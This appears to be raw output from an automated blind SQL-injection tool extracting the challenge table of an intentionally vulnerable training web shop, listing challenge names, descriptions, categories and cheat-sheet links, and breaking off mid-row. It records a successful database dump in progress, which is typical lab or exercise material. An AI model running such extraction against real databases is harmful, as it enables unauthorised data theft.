+[11:56:24] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[11:56:24] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[11:56:24] [INFO] retrieving the length of query output + +[11:56:24] [INFO] retrieved: 26 +[11:56:24] [INFO] retrieved: __________________________ +[11:56:24] [INFO] retrieved: +[11:56:27] [INFO] retrieved: Security through Obscurity +[11:56:27] [INFO] retrieved: Security through Obscurity +[11:56:27] [INFO] retrieving the length of query output + +[11:56:27] [INFO] retrieved: 1 + +[11:56:27] [INFO] retrieved: 0 +[11:56:30] [INFO] retrieving the length of query output + +[11:56:30] [INFO] retrieved: 30 +[11:56:30] [INFO] retrieved: ______________________________ +[11:56:30] [INFO] retrieved: +[11:56:34] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[11:56:34] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[11:56:34] [INFO] retrieving the length of query output + +[11:56:34] [INFO] retrieved: 60 +[11:56:34] [INFO] retrieved: __________________________________ +[11:56:34] [INFO] retrieved: +[11:56:40] [INFO] retrieved: ..before its official announcement. +[11:56:40] [INFO] retrieved: Learn about the Token Sale before its official announcement. +[11:56:40] [INFO] retrieving the length of query output + +[11:56:40] [INFO] retrieved: 1 + +[11:56:40] [INFO] retrieved: 5 +[11:56:40] [INFO] retrieving the length of query output + +[11:56:40] [INFO] retrieved: + +[11:56:40] [INFO] retrieved: +[11:56:40] [INFO] retrieving the length of query output + +[11:56:40] [INFO] retrieved: 1 + +[11:56:40] [INFO] retrieved: 1 +[11:56:41] [INFO] retrieving the length of query output + +[11:56:41] [INFO] retrieved: 1 + +[11:56:41] [INFO] retrieved: 7 +[11:56:41] [INFO] retrieving the length of query output + +[11:56:41] [INFO] retrieved: 18 +[11:56:41] [INFO] retrieved: __________________ +[11:56:41] [INFO] retrieved: +[11:56:43] [INFO] retrieved: tokenSaleChallenge +[11:56:43] [INFO] retrieved: tokenSaleChallenge +[11:56:43] [INFO] retrieving the length of query output + +[11:56:43] [INFO] retrieved: + +[11:56:43] [INFO] retrieved: +[11:56:43] [INFO] retrieving the length of query output + +[11:56:43] [INFO] retrieved: 15 +[11:56:43] [INFO] retrieved: _______________ +[11:56:43] [INFO] retrieved: +[11:56:45] [INFO] retrieved: Blockchain Hype +[11:56:45] [INFO] retrieved: Blockchain Hype +[11:56:45] [INFO] retrieving the length of query output + +[11:56:45] [INFO] retrieved: 1 + +[11:56:45] [INFO] retrieved: 0 +[11:56:45] [INFO] retrieving the length of query output + +[11:56:45] [INFO] retrieved: 52 +[11:56:46] [INFO] retrieved: __________________________________ +[11:56:46] [INFO] retrieved: +[11:56:51] [INFO] retrieved: ..alysis,Web3,With Coding Challenge +[11:56:51] [INFO] retrieved: Contraption,Code Analysis,Web3,With Coding Challenge +[11:56:51] [INFO] retrieving the length of query output + +[11:56:51] [INFO] retrieved: + +[11:56:51] [INFO] retrieved: +[11:56:51] [INFO] retrieving the length of query output + +[11:56:51] [INFO] retrieved: 30 +[11:56:51] [INFO] retrieved: ______________________________ +[11:56:51] [INFO] retrieved: +[11:56:55] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[11:56:55] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[11:56:55] [INFO] retrieving the length of query output + +[11:56:55] [INFO] retrieved: 23 +[11:56:55] [INFO] retrieved: _______________________ +[11:56:55] [INFO] retrieved: +[11:56:57] [INFO] retrieved: Sensitive Data Exposure +[11:56:57] [INFO] retrieved: Sensitive Data Exposure +[11:56:57] [INFO] retrieving the length of query output + +[11:56:57] [INFO] retrieved: 1 + +[11:56:57] [INFO] retrieved: 0 +[11:56:57] [INFO] retrieving the length of query output + +[11:56:57] [INFO] retrieved: 30 +[11:56:58] [INFO] retrieved: ______________________________ +[11:56:58] [INFO] retrieved: +[11:57:01] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[11:57:01] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[11:57:01] [INFO] retrieving the length of query output + +[11:57:01] [INFO] retrieved: 68 +[11:57:01] [INFO] retrieved: __________________________________ +[11:57:01] [INFO] retrieved: +[11:57:11] [INFO] retrieved: .. official Soul Bound Token (NFT). +[11:57:11] [INFO] retrieved: Take over the wallet containing our official Soul Bound Token (NFT). +[11:57:11] [INFO] retrieving the length of query output + +[11:57:11] [INFO] retrieved: 1 + +[11:57:11] [INFO] retrieved: 2 +[11:57:12] [INFO] retrieving the length of query output + +[11:57:12] [INFO] retrieved: + +[11:57:12] [INFO] retrieved: +[11:57:12] [INFO] retrieving the length of query output + +[11:57:12] [INFO] retrieved: 1 + +[11:57:12] [INFO] retrieved: 1 +[11:57:12] [INFO] retrieving the length of query output + +[11:57:12] [INFO] retrieved: 1 + +[11:57:12] [INFO] retrieved: 8 +[11:57:12] [INFO] retrieving the length of query output + +[11:57:12] [INFO] retrieved: 18 +[11:57:12] [INFO] retrieved: __________________ +[11:57:12] [INFO] retrieved: +[11:57:15] [INFO] retrieved: nftUnlockChallenge +[11:57:15] [INFO] retrieved: nftUnlockChallenge +[11:57:15] [INFO] retrieving the length of query output + +[11:57:15] [INFO] retrieved: + +[11:57:15] [INFO] retrieved: +[11:57:15] [INFO] retrieving the length of query output + +[11:57:15] [INFO] retrieved: 12 +[11:57:15] [INFO] retrieved: ____________ +[11:57:15] [INFO] retrieved: +[11:57:17] [INFO] retrieved: NFT Takeover +[11:57:17] [INFO] retrieved: NFT Takeover +[11:57:17] [INFO] retrieving the length of query output + +[11:57:17] [INFO] retrieved: 1 + +[11:57:17] [INFO] retrieved: 0 +[11:57:17] [INFO] retrieving the length of query output + +[11:57:17] [INFO] retrieved: 53 +[11:57:17] [INFO] retrieved: __________________________________ +[11:57:17] [INFO] retrieved: +[11:57:23] [INFO] retrieved: .. Demos,Web3,With Coding Challenge +[11:57:23] [INFO] retrieved: Contraption,Good for Demos,Web3,With Coding Challenge +[11:57:23] [INFO] retrieving the length of query output + +[11:57:23] [INFO] retrieved: + +[11:57:23] [INFO] retrieved: +[11:57:23] [INFO] retrieving the length of query output + +[11:57:23] [INFO] retrieved: 30 +[11:57:23] [INFO] retrieved: ______________________________ +[11:57:23] [INFO] retrieved: +[11:57:26] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[11:57:26] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[11:57:26] [INFO] retrieving the length of query output + +[11:57:26] [INFO] retrieved: 25 +[11:57:27] [INFO] retrieved: _________________________ +[11:57:27] [INFO] retrieved: +[11:57:29] [INFO] retrieved: Improper Input Validation +[11:57:29] [INFO] retrieved: Improper Input Validation +[11:57:29] [INFO] retrieving the length of query output + +[11:57:29] [INFO] retrieved: 1 + +[11:57:29] [INFO] retrieved: 0 +[11:57:30] [INFO] retrieving the length of query output + +[11:57:30] [INFO] retrieved: 30 +[11:57:30] [INFO] retrieved: ______________________________ +[11:57:30] [INFO] retrieved: +[11:57:33] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[11:57:33] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[11:57:33] [INFO] retrieving the length of query output + +[11:57:33] [INFO] retrieved: 60 +[11:57:33] [INFO] retrieved: __________________________________ +[11:57:33] [INFO] retrieved: +[11:57:43] [INFO] retrieved: ..athering BEEs from the bee haven. +[11:57:43] [INFO] retrieved: Mint the Honey Pot NFT by gathering BEEs from the bee haven. +[11:57:43] [INFO] retrieving the length of query output + +[11:57:43] [INFO] retrieved: 1 + +[11:57:43] [INFO] retrieved: 3 +[11:57:43] [INFO] retrieving the length of query output + +[11:57:43] [INFO] retrieved: + +[11:57:43] [INFO] retrieved: +[11:57:44] [INFO] retrieving the length of query output + +[11:57:44] [INFO] retrieved: 1 + +[11:57:44] [INFO] retrieved: 1 +[11:57:44] [INFO] retrieving the length of query output + +[11:57:44] [INFO] retrieved: 1 + +[11:57:44] [INFO] retrieved: 9 +[11:57:44] [INFO] retrieving the length of query output + +[11:57:44] [INFO] retrieved: 16 +[11:57:44] [INFO] retrieved: ________________ +[11:57:44] [INFO] retrieved: +[11:57:46] [INFO] retrieved: nftMintChallenge +[11:57:46] [INFO] retrieved: nftMintChallenge +[11:57:46] [INFO] retrieving the length of query output + +[11:57:46] [INFO] retrieved: + +[11:57:46] [INFO] retrieved: +[11:57:46] [INFO] retrieving the length of query output + +[11:57:46] [INFO] retrieved: 18 +[11:57:47] [INFO] retrieved: __________________ +[11:57:47] [INFO] retrieved: +[11:57:49] [INFO] retrieved: Mint the Honey Pot +[11:57:49] [INFO] retrieved: Mint the Honey Pot +[11:57:49] [INFO] retrieving the length of query output + +[11:57:49] [INFO] retrieved: 1 + +[11:57:49] [INFO] retrieved: 0 +[11:57:49] [INFO] retrieving the length of query output + +[11:57:49] [INFO] retrieved: 43 +[11:57:49] [INFO] retrieved: __________________________________ +[11:57:49] [INFO] retrieved: +[11:57:54] [INFO] retrieved: ..net Traffic,With Coding Challenge +[11:57:54] [INFO] retrieved: Web3,Internet Traffic,With Coding Challenge +[11:57:54] [INFO] retrieving the length of query output + +[11:57:54] [INFO] retrieved: + +[11:57:54] [INFO] retrieved: +[11:57:54] [INFO] retrieving the length of query output + +[11:57:54] [INFO] retrieved: 30 +[11:57:55] [INFO] retrieved: ______________________________ +[11:57:55] [INFO] retrieved: +[11:57:58] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[11:57:58] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[11:57:58] [INFO] retrieving the length of query output + +[11:57:58] [INFO] retrieved: 13 +[11:57:58] [INFO] retrieved: _____________ +[11:57:58] [INFO] retrieved: +[11:58:00] [INFO] retrieved: Miscellaneous +[11:58:00] [INFO] retrieved: Miscellaneous +[11:58:00] [INFO] retrieving the length of query output + +[11:58:00] [INFO] retrieved: 1 + +[11:58:00] [INFO] retrieved: 0 +[11:58:00] [INFO] retrieving the length of query output + +[11:58:00] [INFO] retrieved: 30 +[11:58:00] [INFO] retrieved: ______________________________ +[11:58:00] [INFO] retrieved: +[11:58:03] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[11:58:03] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[11:58:03] [INFO] retrieving the length of query output + +[11:58:03] [INFO] retrieved: 57 +[11:58:04] [INFO] retrieved: __________________________________ +[11:58:04] [INFO] retrieved: +[11:58:10] [INFO] retrieved: ..he new wallet than you deposited. +[11:58:10] [INFO] retrieved: Withdraw more ETH from the new wallet than you deposited. +[11:58:10] [INFO] retrieving the length of query output + +[11:58:10] [INFO] retrieved: 1 + +[11:58:10] [INFO] retrieved: 6 +[11:58:10] [INFO] retrieving the length of query output + +[11:58:10] [INFO] retrieved: + +[11:58:10] [INFO] retrieved: +[11:58:10] [INFO] retrieving the length of query output + +[11:58:10] [INFO] retrieved: 1 + +[11:58:10] [INFO] retrieved: 1 +[11:58:10] [INFO] retrieving the length of query output + +[11:58:10] [INFO] retrieved: 2 +[11:58:10] [INFO] retrieved: __ +[11:58:10] [INFO] retrieved: +[11:58:11] [INFO] retrieved: 10 +[11:58:11] [INFO] retrieved: 10 +[11:58:11] [INFO] retrieving the length of query output + +[11:58:11] [INFO] retrieved: 19 +[11:58:11] [INFO] retrieved: ___________________ +[11:58:11] [INFO] retrieved: +[11:58:17] [INFO] retrieved: web3WalletChallenge +[11:58:17] [INFO] retrieved: web3WalletChallenge +[11:58:17] [INFO] retrieving the length of query output + +[11:58:17] [INFO] retrieved: + +[11:58:17] [INFO] retrieved: +[11:58:17] [INFO] retrieving the length of query output + +[11:58:17] [INFO] retrieved: 16 +[11:58:17] [INFO] retrieved: ________________ +[11:58:17] [INFO] retrieved: +[11:58:19] [INFO] retrieved: Wallet Depletion +[11:58:19] [INFO] retrieved: Wallet Depletion +[11:58:19] [INFO] retrieving the length of query output + +[11:58:19] [INFO] retrieved: 1 + +[11:58:19] [INFO] retrieved: 0 +[11:58:19] [INFO] retrieving the length of query output + +[11:58:19] [INFO] retrieved: 43 +[11:58:19] [INFO] retrieved: __________________________________ +[11:58:19] [INFO] retrieved: +[11:58:24] [INFO] retrieved: ..net Traffic,With Coding Challenge +[11:58:24] [INFO] retrieved: Web3,Internet Traffic,With Coding Challenge +[11:58:24] [INFO] retrieving the length of query output + +[11:58:24] [INFO] retrieved: + +[11:58:24] [INFO] retrieved: +[11:58:24] [INFO] retrieving the length of query output + +[11:58:24] [INFO] retrieved: 30 +[11:58:24] [INFO] retrieved: ______________________________ +[11:58:24] [INFO] retrieved: +[11:58:27] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[11:58:27] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[11:58:27] [INFO] retrieving the length of query output + +[11:58:27] [INFO] retrieved: 21 +[11:58:28] [INFO] retrieved: _____________________ +[11:58:28] [INFO] retrieved: +[11:58:30] [INFO] retrieved: Broken Access Control +[11:58:30] [INFO] retrieved: Broken Access Control +[11:58:30] [INFO] retrieving the length of query output + +[11:58:30] [INFO] retrieved: 1 + +[11:58:30] [INFO] retrieved: 0 +[11:58:30] [INFO] retrieving the length of query output + +[11:58:30] [INFO] retrieved: 30 +[11:58:30] [INFO] retrieved: ______________________________ +[11:58:30] [INFO] retrieved: +[11:58:33] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[11:58:34] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[11:58:34] [INFO] retrieving the length of query output + +[11:58:34] [INFO] retrieved: 82 +[11:58:34] [INFO] retrieved: __________________________________ +[11:58:34] [INFO] retrieved: +[11:58:42] [INFO] retrieved: ..iting smart contracts on the fly. +[11:58:42] [INFO] retrieved: Find an accidentally deployed code sandbox for writing smart contracts on the fly. +[11:58:42] [INFO] retrieving the length of query output + +[11:58:42] [INFO] retrieved: 1 + +[11:58:42] [INFO] retrieved: 1 +[11:58:42] [INFO] retrieving the length of query output + +[11:58:42] [INFO] retrieved: + +[11:58:42] [INFO] retrieved: +[11:58:43] [INFO] retrieving the length of query output + +[11:58:43] [INFO] retrieved: 1 + +[11:58:43] [INFO] retrieved: 1 +[11:58:43] [INFO] retrieving the length of query output + +[11:58:43] [INFO] retrieved: 2 +[11:58:43] [INFO] retrieved: __ +[11:58:43] [INFO] retrieved: +[11:58:43] [INFO] retrieved: 11 +[11:58:43] [INFO] retrieved: 11 +[11:58:43] [INFO] retrieving the length of query output + +[11:58:43] [INFO] retrieved: 20 +[11:58:43] [INFO] retrieved: ____________________ +[11:58:43] [INFO] retrieved: +[11:58:46] [INFO] retrieved: web3SandboxChallenge +[11:58:46] [INFO] retrieved: web3SandboxChallenge +[11:58:46] [INFO] retrieving the length of query output + +[11:58:46] [INFO] retrieved: + +[11:58:46] [INFO] retrieved: +[11:58:46] [INFO] retrieving the length of query output + +[11:58:46] [INFO] retrieved: 12 +[11:58:46] [INFO] retrieved: ____________ +[11:58:46] [INFO] retrieved: +[11:58:48] [INFO] retrieved: Web3 Sandbox +[11:58:48] [INFO] retrieved: Web3 Sandbox +[11:58:48] [INFO] retrieving the length of query output + +[11:58:48] [INFO] retrieved: 1 + +[11:58:48] [INFO] retrieved: 0 +[11:58:51] [INFO] retrieving the length of query output + +[11:58:51] [INFO] retrieved: 26 +[11:58:51] [INFO] retrieved: __________________________ +[11:58:51] [INFO] retrieved: +[11:58:54] [INFO] retrieved: Web3,With Coding Challenge +[11:58:54] [INFO] retrieved: Web3,With Coding Challenge +[11:58:54] [INFO] retrieving the length of query output + +[11:58:54] [INFO] retrieved: + +[11:58:54] [INFO] retrieved: +[11:58:54] [INFO] retrieving the length of query output + +[11:58:54] [INFO] retrieved: 30 +[11:58:54] [INFO] retrieved: ______________________________ +[11:58:54] [INFO] retrieved: +[11:58:57] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[11:58:57] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[11:58:57] [INFO] retrieving the length of query output + +[11:58:57] [INFO] retrieved: 24 +[11:58:58] [INFO] retrieved: ________________________ +[11:58:58] [INFO] retrieved: +[11:59:00] [INFO] retrieved: Insecure Deserialization +[11:59:00] [INFO] retrieved: Insecure Deserialization +[11:59:00] [INFO] retrieving the length of query output + +[11:59:00] [INFO] retrieved: 1 + +[11:59:00] [INFO] retrieved: 0 +[11:59:00] [INFO] retrieving the length of query output + +[11:59:00] [INFO] retrieved: 30 +[11:59:00] [INFO] retrieved: ______________________________ +[11:59:00] [INFO] retrieved: +[11:59:04] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[11:59:04] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[11:59:04] [INFO] retrieving the length of query output + +[11:59:04] [INFO] retrieved: 175 +[11:59:04] [INFO] retrieved: __________________________________ +[11:59:04] [INFO] retrieved: +[11:59:23] [INFO] retrieved: ..harmful on Docker!) +[11:59:23] [INFO] retrieved: Perform a Remote Code Execution that would keep a less hardened application busy forever. (This challenge is potentially harmful on Docker!) +[11:59:23] [INFO] retrieving the length of query output + +[11:59:23] [INFO] retrieved: 1 + +[11:59:23] [INFO] retrieved: 5 +[11:59:23] [INFO] retrieving the length of query output + +[11:59:23] [INFO] retrieved: 6 +[11:59:26] [INFO] retrieved: ______ +[11:59:26] [INFO] retrieved: +[11:59:27] [INFO] retrieved: Docker +[11:59:27] [INFO] retrieved: Docker +[11:59:27] [INFO] retrieving the length of query output + +[11:59:27] [INFO] retrieved: 1 + +[11:59:27] [INFO] retrieved: 0 +[11:59:27] [INFO] retrieving the length of query output + +[11:59:27] [INFO] retrieved: 2 +[11:59:27] [INFO] retrieved: __ +[11:59:27] [INFO] retrieved: +[11:59:27] [INFO] retrieved: 12 +[11:59:27] [INFO] retrieved: 12 +[11:59:27] [INFO] retrieving the length of query output + +[11:59:27] [INFO] retrieved: 12 +[11:59:28] [INFO] retrieved: ____________ +[11:59:28] [INFO] retrieved: +[11:59:29] [INFO] retrieved: rceChallenge +[11:59:29] [INFO] retrieved: rceChallenge +[11:59:29] [INFO] retrieving the length of query output + +[11:59:29] [INFO] retrieved: 81 +[11:59:29] [INFO] retrieved: __________________________________ +[11:59:29] [INFO] retrieved: +[11:59:37] [INFO] retrieved: ..enial_of_Service_Cheat_Sheet.html +[11:59:37] [INFO] retrieved: https://cheatsheetseries.owasp.org/cheatsheets/Denial_of_Service_Cheat_Sheet.html +[11:59:37] [INFO] retrieving the length of query output + +[11:59:37] [INFO] retrieved: 15 +[11:59:37] [INFO] retrieved: _______________ +[11:59:37] [INFO] retrieved: +[11:59:39] [INFO] retrieved: Blocked RCE DoS +[11:59:39] [INFO] retrieved: Blocked RCE DoS +[11:59:39] [INFO] retrieving the length of query output + +[11:59:39] [INFO] retrieved: 1 + +[11:59:39] [INFO] retrieved: 0 +[11:59:39] [INFO] retrieving the length of query output + +[11:59:39] [INFO] retrieved: 11 +[11:59:39] [INFO] retrieved: ___________ +[11:59:39] [INFO] retrieved: +[11:59:41] [INFO] retrieved: Danger Zone +[11:59:41] [INFO] retrieved: Danger Zone +[11:59:41] [INFO] retrieving the length of query output + +[11:59:41] [INFO] retrieved: + +[11:59:41] [INFO] retrieved: +[11:59:41] [INFO] retrieving the length of query output + +[11:59:41] [INFO] retrieved: 30 +[11:59:41] [INFO] retrieved: ______________________________ +[11:59:41] [INFO] retrieved: +[11:59:45] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[11:59:45] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[11:59:45] [INFO] retrieving the length of query output + +[11:59:45] [INFO] retrieved: 22 +[11:59:45] [INFO] retrieved: ______________________ +[11:59:45] [INFO] retrieved: +[11:59:47] [INFO] retrieved: Broken Anti Automation +[11:59:47] [INFO] retrieved: Broken Anti Automation +[11:59:47] [INFO] retrieving the length of query output + +[11:59:47] [INFO] retrieved: 1 + +[11:59:47] [INFO] retrieved: 0 +[11:59:48] [INFO] retrieving the length of query output + +[11:59:48] [INFO] retrieved: 30 +[11:59:48] [INFO] retrieved: ______________________________ +[11:59:48] [INFO] retrieved: +[11:59:51] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[11:59:51] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[11:59:51] [INFO] retrieving the length of query output + +[11:59:51] [INFO] retrieved: 55 +[11:59:51] [INFO] retrieved: __________________________________ +[11:59:51] [INFO] retrieved: +[11:59:57] [INFO] retrieved: ..omer feedbacks within 20 seconds. +[11:59:57] [INFO] retrieved: Submit 10 or more customer feedbacks within 20 seconds. +[11:59:57] [INFO] retrieving the length of query output + +[11:59:57] [INFO] retrieved: 1 + +[11:59:57] [INFO] retrieved: 3 +[11:59:57] [INFO] retrieving the length of query output + +[11:59:57] [INFO] retrieved: + +[11:59:57] [INFO] retrieved: +[11:59:57] [INFO] retrieving the length of query output + +[11:59:57] [INFO] retrieved: 1 + +[11:59:57] [INFO] retrieved: 0 +[11:59:58] [INFO] retrieving the length of query output + +[11:59:58] [INFO] retrieved: 2 +[11:59:58] [INFO] retrieved: __ +[11:59:58] [INFO] retrieved: +[11:59:58] [INFO] retrieved: 13 +[11:59:58] [INFO] retrieved: 13 +[11:59:58] [INFO] retrieving the length of query output + +[11:59:58] [INFO] retrieved: 22 +[11:59:58] [INFO] retrieved: ______________________ +[11:59:58] [INFO] retrieved: +[12:00:01] [INFO] retrieved: captchaBypassChallenge +[12:00:01] [INFO] retrieved: captchaBypassChallenge +[12:00:01] [INFO] retrieving the length of query output + +[12:00:01] [INFO] retrieved: + +[12:00:01] [INFO] retrieved: +[12:00:01] [INFO] retrieving the length of query output + +[12:00:01] [INFO] retrieved: 14 +[12:00:01] [INFO] retrieved: ______________ +[12:00:01] [INFO] retrieved: +[12:00:03] [INFO] retrieved: CAPTCHA Bypass +[12:00:03] [INFO] retrieved: CAPTCHA Bypass +[12:00:03] [INFO] retrieving the length of query output + +[12:00:03] [INFO] retrieved: 1 + +[12:00:03] [INFO] retrieved: 0 +[12:00:03] [INFO] retrieving the length of query output + +[12:00:03] [INFO] retrieved: 11 +[12:00:03] [INFO] retrieved: ___________ +[12:00:03] [INFO] retrieved: +[12:00:04] [INFO] retrieved: Brute Force +[12:00:04] [INFO] retrieved: Brute Force +[12:00:04] [INFO] retrieving the length of query output + +[12:00:04] [INFO] retrieved: + +[12:00:04] [INFO] retrieved: +[12:00:04] [INFO] retrieving the length of query output + +[12:00:04] [INFO] retrieved: 30 +[12:00:05] [INFO] retrieved: ______________________________ +[12:00:05] [INFO] retrieved: +[12:00:08] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[12:00:08] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[12:00:08] [INFO] retrieving the length of query output + +[12:00:08] [INFO] retrieved: 21 +[12:00:08] [INFO] retrieved: _____________________ +[12:00:08] [INFO] retrieved: +[12:00:11] [INFO] retrieved: Broken Authentication +[12:00:11] [INFO] retrieved: Broken Authentication +[12:00:11] [INFO] retrieving the length of query output + +[12:00:11] [INFO] retrieved: 1 + +[12:00:11] [INFO] retrieved: 0 +[12:00:11] [INFO] retrieving the length of query output + +[12:00:11] [INFO] retrieved: 30 +[12:00:11] [INFO] retrieved: ______________________________ +[12:00:11] [INFO] retrieved: +[12:00:19] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[12:00:19] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[12:00:19] [INFO] retrieving the length of query output + +[12:00:19] [INFO] retrieved: 97 +[12:00:19] [INFO] retrieved: __________________________________ +[12:00:19] [INFO] retrieved: +[12:00:29] [INFO] retrieved: ..SQL Injection or Forgot Password. +[12:00:29] [INFO] retrieved: Change Bender's password into slurmCl4ssic without using SQL Injection or Forgot Password. +[12:00:29] [INFO] retrieving the length of query output + +[12:00:29] [INFO] retrieved: 1 + +[12:00:29] [INFO] retrieved: 5 +[12:00:30] [INFO] retrieving the length of query output + +[12:00:30] [INFO] retrieved: + +[12:00:30] [INFO] retrieved: +[12:00:30] [INFO] retrieving the length of query output + +[12:00:30] [INFO] retrieved: 1 + +[12:00:30] [INFO] retrieved: 0 +[12:00:30] [INFO] retrieving the length of query output + +[12:00:30] [INFO] retrieved: 2 +[12:00:30] [INFO] retrieved: __ +[12:00:30] [INFO] retrieved: +[12:00:30] [INFO] retrieved: 14 +[12:00:30] [INFO] retrieved: 14 +[12:00:31] [INFO] retrieving the length of query output + +[12:00:30] [INFO] retrieved: 29 +[12:00:31] [INFO] retrieved: _____________________________ +[12:00:31] [INFO] retrieved: +[12:00:34] [INFO] retrieved: changePasswordBenderChallenge +[12:00:34] [INFO] retrieved: changePasswordBenderChallenge +[12:00:34] [INFO] retrieving the length of query output + +[12:00:34] [INFO] retrieved: 78 +[12:00:34] [INFO] retrieved: __________________________________ +[12:00:34] [INFO] retrieved: +[12:00:42] [INFO] retrieved: ..s/Authentication_Cheat_Sheet.html +[12:00:42] [INFO] retrieved: https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html +[12:00:42] [INFO] retrieving the length of query output + +[12:00:42] [INFO] retrieved: 24 +[12:00:42] [INFO] retrieved: ________________________ +[12:00:42] [INFO] retrieved: +[12:00:44] [INFO] retrieved: Change Bender's Password +[12:00:44] [INFO] retrieved: Change Bender's Password +[12:00:44] [INFO] retrieving the length of query output + +[12:00:44] [INFO] retrieved: 1 + +[12:00:45] [INFO] retrieved: 0 +[12:00:45] [INFO] retrieving the length of query output + +[12:00:45] [INFO] retrieved: + +[12:00:45] [INFO] retrieved: +[12:00:45] [INFO] retrieving the length of query output + +[12:00:45] [INFO] retrieved: + +[12:00:45] [INFO] retrieved: +[12:00:45] [INFO] retrieving the length of query output + +[12:00:45] [INFO] retrieved: 30 +[12:00:45] [INFO] retrieved: ______________________________ +[12:00:45] [INFO] retrieved: +[12:00:49] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[12:00:49] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[12:00:49] [INFO] retrieving the length of query output + +[12:00:49] [INFO] retrieved: 9 +[12:00:49] [INFO] retrieved: _________ +[12:00:49] [INFO] retrieved: +[12:00:50] [INFO] retrieved: Injection +[12:00:50] [INFO] retrieved: Injection +[12:00:50] [INFO] retrieving the length of query output + +[12:00:50] [INFO] retrieved: 1 + +[12:00:53] [INFO] retrieved: 0 +[12:00:53] [INFO] retrieving the length of query output + +[12:00:53] [INFO] retrieved: 30 +[12:00:53] [INFO] retrieved: ______________________________ +[12:00:53] [INFO] retrieved: +[12:00:57] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[12:00:57] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[12:00:57] [INFO] retrieving the length of query output + +[12:00:57] [INFO] retrieved: 42 +[12:00:57] [INFO] retrieved: __________________________________ +[12:00:57] [INFO] retrieved: +[12:01:01] [INFO] retrieved: .. Christmas special offer of 2014. +[12:01:01] [INFO] retrieved: Order the Christmas special offer of 2014. +[12:01:01] [INFO] retrieving the length of query output + +[12:01:01] [INFO] retrieved: 1 + +[12:01:01] [INFO] retrieved: 4 +[12:01:01] [INFO] retrieving the length of query output + +[12:01:01] [INFO] retrieved: + +[12:01:02] [INFO] retrieved: +[12:01:02] [INFO] retrieving the length of query output + +[12:01:02] [INFO] retrieved: 1 + +[12:01:02] [INFO] retrieved: 0 +[12:01:02] [INFO] retrieving the length of query output + +[12:01:02] [INFO] retrieved: 2 +[12:01:02] [INFO] retrieved: __ +[12:01:02] [INFO] retrieved: +[12:01:02] [INFO] retrieved: 15 +[12:01:02] [INFO] retrieved: 15 +[12:01:02] [INFO] retrieving the length of query output + +[12:01:02] [INFO] retrieved: 25 +[12:01:03] [INFO] retrieved: _________________________ +[12:01:03] [INFO] retrieved: +[12:01:05] [INFO] retrieved: christmasSpecialChallenge +[12:01:05] [INFO] retrieved: christmasSpecialChallenge +[12:01:05] [INFO] retrieving the length of query output + +[12:01:05] [INFO] retrieved: 88 +[12:01:05] [INFO] retrieved: __________________________________ +[12:01:05] [INFO] retrieved: +[12:01:15] [INFO] retrieved: ..ction_Prevention_Cheat_Sheet.html +[12:01:15] [INFO] retrieved: https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html +[12:01:15] [INFO] retrieving the length of query output + +[12:01:15] [INFO] retrieved: 17 +[12:01:15] [INFO] retrieved: _________________ +[12:01:15] [INFO] retrieved: +[12:01:17] [INFO] retrieved: Christmas Special +[12:01:17] [INFO] retrieved: Christmas Special +[12:01:17] [INFO] retrieving the length of query output + +[12:01:17] [INFO] retrieved: 1 + +[12:01:17] [INFO] retrieved: 0 +[12:01:17] [INFO] retrieving the length of query output + +[12:01:17] [INFO] retrieved: + +[12:01:17] [INFO] retrieved: +[12:01:17] [INFO] retrieving the length of query output + +[12:01:17] [INFO] retrieved: + +[12:01:17] [INFO] retrieved: +[12:01:18] [INFO] retrieving the length of query output + +[12:01:18] [INFO] retrieved: 30 +[12:01:18] [INFO] retrieved: ______________________________ +[12:01:18] [INFO] retrieved: +[12:01:21] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[12:01:21] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[12:01:21] [INFO] retrieving the length of query output + +[12:01:21] [INFO] retrieved: 3 +[12:01:21] [INFO] retrieved: ___ +[12:01:21] [INFO] retrieved: +[12:01:21] [INFO] retrieved: XSS +[12:01:22] [INFO] retrieved: XSS +[12:01:22] [INFO] retrieving the length of query output + +[12:01:22] [INFO] retrieved: 1 + +[12:01:22] [INFO] retrieved: 0 +[12:01:22] [INFO] retrieving the length of query output + +[12:01:22] [INFO] retrieved: 30 